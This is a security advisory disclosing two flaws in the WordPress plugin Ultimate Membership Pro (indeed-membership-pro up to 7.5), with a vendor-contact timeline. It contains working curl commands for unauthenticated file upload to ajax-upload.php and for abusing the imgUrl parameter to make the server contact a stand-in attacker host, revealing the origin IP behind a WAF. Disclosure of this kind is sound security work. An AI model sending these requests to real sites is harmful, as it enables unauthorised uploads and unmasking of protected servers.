WordPress plugin: indeed-membership-pro <=7.5 arbitrary image upload
##Abstract
Ultimate Membership Pro is the well known and the best WordPress Membership Plugin that allow you to create and work with multi-level exclusive access for your Members based on simple Free packages or Payed packages.[1]
The ajax-upload.php endpoint doesn’t check for the current user’s capabilities (or that they are even logged in), so we can do a couple things we shouldn’t be able to do:
##Vulnerability #1 - Unauthenticated arbitrary image upload
Simply POST the image file in the field ihc_file and it’ll store it for you:
~$ curl -F "ihc_file=@some-image.png" https://vulnerable.host/wp-content/plugins/indeed-membership-pro/public/ajax-upload.php
{"id":20,"url":"https:\/\/vulnerable.host\/wp-content\/uploads\/2019\/01\/some-image.png","secret":"81b3ce5c8991c26f067a6d32c1cf66ff","name":"some-image.png","type":"other"}
##Vulnerability #2 - Determine IP address of origin (not present in all versions)
In addition to cropping/rotating/resizing an image of your choosing, you can abuse the imgUrl feature on versions that it’s available on (7.4.2+ at least) to make an HTTP request to any site you want. By having it connect to a site you control, you can determine the IP address of the origin even when the site is behind a third party WAF such as Fastly, Cloudflare, Sucuri, etc:
curl -d "imgUrl=https://some-evil-host.evil/pwned.png" -d 'imgInitW=1' -d 'imgInitH=1' -d 'imgW=1' -d 'imgH=1' -d 'imgY1=1' -d 'imgX1=1' -d 'cropW=1' -d 'cropH=1' -d 'rotation=0' https://vulnerable.host/wp-content/plugins/indeed-membership-pro/public/ajax-upload.php
##Solutions/workarounds
None, uninstall the plugin until the developer fixes it.
##Disclosure Timeline
- 2019-01-23: Vendor contacted (Website contact form, Facebook) - no response.
- 2019-02-04: Vendor contacted again (Envato contact form) - no response.
- 2019-02-25: Heads-up posted to #wordpress on Freenode.
- 2019-02-26: Public disclosure.
##References